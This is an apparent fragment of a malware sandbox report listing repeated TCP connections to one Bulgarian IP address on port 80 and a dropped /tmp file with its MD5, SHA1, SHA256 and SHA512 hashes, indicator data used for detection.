| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |